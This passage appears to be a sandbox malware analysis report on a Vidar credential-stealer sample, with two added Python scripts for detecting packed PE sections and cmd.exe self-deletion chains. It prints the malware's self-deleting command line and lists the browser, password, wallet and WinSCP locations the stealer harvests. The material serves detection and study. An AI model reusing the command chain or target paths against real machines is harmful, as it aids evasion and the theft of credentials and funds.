                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
                        Source: Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe
                        Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
Source: mozglue[1].dll.1.dr | Static PE information: section name: .didat
Source: mozglue.dll.1.dr | Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr | Static PE information: section name: .didat
Source: msvcp140.dll.1.dr | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041A730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,
Source: initial sample | Static PE information: section name: .text entropy: 7.9868866426
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dll
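The two static indicators above (a .text section at entropy 7.99 and the section rights reported in the report's E/R/W notation) are cheap to reproduce outside the sandbox. The script below is an added example, not Joe Sandbox code: it walks the PE section table with the standard library only, computes per-section Shannon entropy, and flags executable high-entropy sections, W+X sections and non-standard section names. It runs against a constructed minimal PE32 image (deterministic pseudo-random bytes standing in for packed code) so it works offline; the 7.2 threshold and the "standard section" list are choices of this example, and `triage_file` is the function you would point at a real sample.

```python
"""Static packing triage: section rights and entropy from the PE section table."""
import math
import random
import struct
from typing import Iterator, List, Tuple

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(blob: bytes) -> Iterator[Tuple[str, str, float]]:
    """Yield (name, rights, entropy) per section; rights use the report's E/R/W letters."""
    if blob[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    # COFF header: NumberOfSections at +2, SizeOfOptionalHeader at +16
    num_sections, size_opt = struct.unpack_from("<H12xH", blob, coff + 2)
    table = coff + 20 + size_opt
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", blob, table + 40 * i)
        rights = (("E" if chars & IMAGE_SCN_MEM_EXECUTE else "")
                  + ("R" if chars & IMAGE_SCN_MEM_READ else "")
                  + ("W" if chars & IMAGE_SCN_MEM_WRITE else ""))
        yield (name.rstrip(b"\0").decode("ascii", "replace"), rights,
               shannon_entropy(blob[raw_ptr:raw_ptr + raw_size]))


def packing_indicators(blob: bytes, threshold: float = 7.2) -> List[str]:
    """Findings a triage analyst wants before unpacking: packed code, W+X, odd names."""
    findings = []
    for name, rights, ent in pe_sections(blob):
        if "E" in rights and ent >= threshold:
            findings.append(f"{name}: executable section with entropy {ent:.2f}, likely packed")
        if "E" in rights and "W" in rights:
            findings.append(f"{name}: writable and executable")
        if name not in STANDARD_SECTIONS:
            findings.append(f"{name}: non-standard section name")
    return findings


def build_sample_pe(sections) -> bytes:
    """Constructed PE32 image: DOS stub, COFF header, zeroed optional header, section table, raw data."""
    file_align, size_opt = 0x200, 0xE0
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    opt = b"\x0b\x01" + bytes(size_opt - 2)          # PE32 magic, rest unused here
    header_len = 0x40 + 4 + 20 + size_opt + 40 * len(sections)
    raw_ptr = -(-header_len // file_align) * file_align
    table, body = b"", b""
    for name, data, chars in sections:
        raw_size = -(-len(data) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             0x1000 + len(body), raw_size, raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\0")
    return (bytes(dos) + b"PE\0\0" + coff + opt + table).ljust(raw_ptr, b"\0") + body


# Constructed section contents: deterministic pseudo-random bytes stand in for a packed
# .text (entropy close to 8); a repeating instruction pattern stands in for plain code.
_rng = random.Random(491601)
PACKED_TEXT = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN_CODE = b"\x55\x8b\xec\x83\xec\x10" * 682
SAMPLE_PE = build_sample_pe([
    (".text", PACKED_TEXT, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", PLAIN_CODE, IMAGE_SCN_MEM_READ),
    (".didat", PLAIN_CODE, IMAGE_SCN_MEM_READ),
])


def triage_file(path: str) -> List[str]:
    with open(path, "rb") as f:
        return packing_indicators(f.read())


if __name__ == "__main__":
    for name, rights, ent in pe_sections(SAMPLE_PE):
        print(f"{name}:{rights} entropy={ent:.3f}")
    for line in packing_indicators(SAMPLE_PE):
        print(line)
```

Treat the non-standard-name rule as a hint rather than a verdict: .didat is the MSVC linker's delay-load import section, which is why it shows up in the legitimate mozglue and msvcp140 support DLLs the sample drops, and the scanner results further down rate those files at 0-3%. The entropy rule is the one that separates the packed loader from its runtime dependencies.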

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00496880 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe TID: 6920 | Thread sleep count: 48 > 30
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\nss3[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\msvcp140[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\vcruntime140[1].dll
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00492480 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00492694h
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0044E950 GetSystemInfo,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: T6zZFfRLqs.exe, 00000001.00000002.397837562.000000000082A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:NT
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041A730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041A030 GetProcessHeap,HeapAlloc,_strcpy_s,
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00401000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Autofill\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\CC\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Edge_Cookies.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\IE_Cookies.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Downloads\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Files\Default.zip VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\History\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\information.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\passwords.txt VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Queries volume information: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\screenshot.jpg VolumeInformation
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memmove,_memmove,_memset,LocalFree,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041F2B3 __wgetenv,__wgetenv,__wgetenv,_memset,GetVersionExA,CreateDirectoryA,_memset,__wgetenv,DeleteFileA,DeleteFileA,DeleteFileA,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00491AC0 GetUserNameA,
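The self-deletion chain recorded in this section (cmd.exe /c taskkill on the sample's own image, a timeout, del of the executable, then a wildcard del of the DLLs dropped into C:\ProgramData) is the part of the run most worth turning into a process-creation detection, because it survives repacking. The script below is an added example, not Joe Sandbox output: it splits a cmd.exe command line into its & stages and flags the stages that delete the parent's own image, kill and delete the same image, sweep ProgramData with a wildcard, or delay first. The event dicts are constructed Sysmon-style records (ParentImage, Image, CommandLine); the first copies the command line from the report, the other two are invented benign and borderline cases.

```python
"""Flag cmd.exe self-deletion chains from process-creation events."""
import ntpath
import re
from typing import Dict, List

# "cmd.exe /c" prefix with an optional quoted full path, then /c, /k or /d
_CMD_PREFIX = re.compile(r"""^\s*['"]?(?:[a-z]:\\[^'"]*\\)?cmd(?:\.exe)?['"]?\s+/[cdk]\s+""", re.I)
_TASKKILL = re.compile(r"""^taskkill\b.*?/im\s+['"]?(?P<image>[^\s'"]+)""", re.I)
_DELAY = re.compile(r"^(?:timeout|ping|choice)\b", re.I)
_DEL = re.compile(r"^(?:del|erase)\b(?P<args>.*)$", re.I)
_ARG = re.compile(r"""'[^']*'|"[^"]*"|\S+""")


def split_chain(cmdline: str) -> List[str]:
    """Drop the cmd.exe /c prefix and split the remainder on &, && and ||."""
    body = _CMD_PREFIX.sub("", cmdline, count=1).strip()
    return [s.strip() for s in re.split(r"\s*(?:&&|\|\||&)\s*", body) if s.strip()]


def del_targets(args: str) -> List[str]:
    """Positional arguments of a del stage, quotes removed, switches such as /f /q skipped."""
    return [a.strip("'\"") for a in _ARG.findall(args) if not a.startswith("/")]


def self_delete_findings(event: Dict[str, str]) -> List[str]:
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    findings: List[str] = []
    killed = ""
    delayed = False
    for stage in split_chain(event["CommandLine"]):
        m = _TASKKILL.match(stage)
        if m:
            killed = m.group("image").lower()
            continue
        if _DELAY.match(stage):
            delayed = True
            continue
        m = _DEL.match(stage)
        if not m:
            continue
        for target in del_targets(m.group("args")):
            base = ntpath.basename(target).lower()
            if parent and base == parent:
                findings.append(f"parent process deletes its own image: {target}")
            if killed and base == killed:
                findings.append(f"kills and then deletes the same image: {target}")
            if "*" in base and target.lower().startswith("c:\\programdata\\"):
                findings.append(f"wildcard sweep of dropped files: {target}")
    if findings and delayed:
        findings.append("delay stage before delete (waits for the parent to exit)")
    return findings


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Parent image name -> findings, for events that produced any."""
    out = {}
    for ev in events:
        f = self_delete_findings(ev)
        if f:
            out[ntpath.basename(ev["ParentImage"])] = f
    return out


EVENTS = [
    {   # the chain this report recorded
        "ParentImage": r"C:\Users\user\Desktop\T6zZFfRLqs.exe",
        "Image": r"C:\Windows\SysWOW64\cmd.exe",
        "CommandLine": r"'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit",
    },
    {   # constructed benign build-step cleanup
        "ParentImage": r"C:\Program Files\dotnet\dotnet.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c del /f /q "C:\src\app\obj\*.tmp"',
    },
    {   # constructed installer removing its own temp copy: a real self-delete, but no taskkill or ProgramData sweep
        "ParentImage": r"C:\Users\user\AppData\Local\Temp\setup_tmp.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /c timeout /t 3 & del "C:\Users\user\AppData\Local\Temp\setup_tmp.exe"',
    },
]

if __name__ == "__main__":
    for parent, findings in triage(EVENTS).items():
        print(parent, "->", "; ".join(findings))
```

Self-cleaning installers are the standing false positive for the "deletes its own image" rule alone, which is why the third event still fires. What is specific to this sample is the combination: kill of the parent by name, a delay, deletion of the parent, and the wildcard sweep of C:\ProgramData\*.dll that removes the NSS and CRT DLLs listed under Data Obfuscation. Alerting on two or more findings, or on the ProgramData sweep at all, keeps the installer noise out.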

Stealing of Sensitive Information:

Yara detected Vidar
Source: Yara match | File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match | File source: 1.2.T6zZFfRLqs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.T6zZFfRLqs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????i
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?????
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Found many strings related to Crypto-Wallets (likely being stolen)
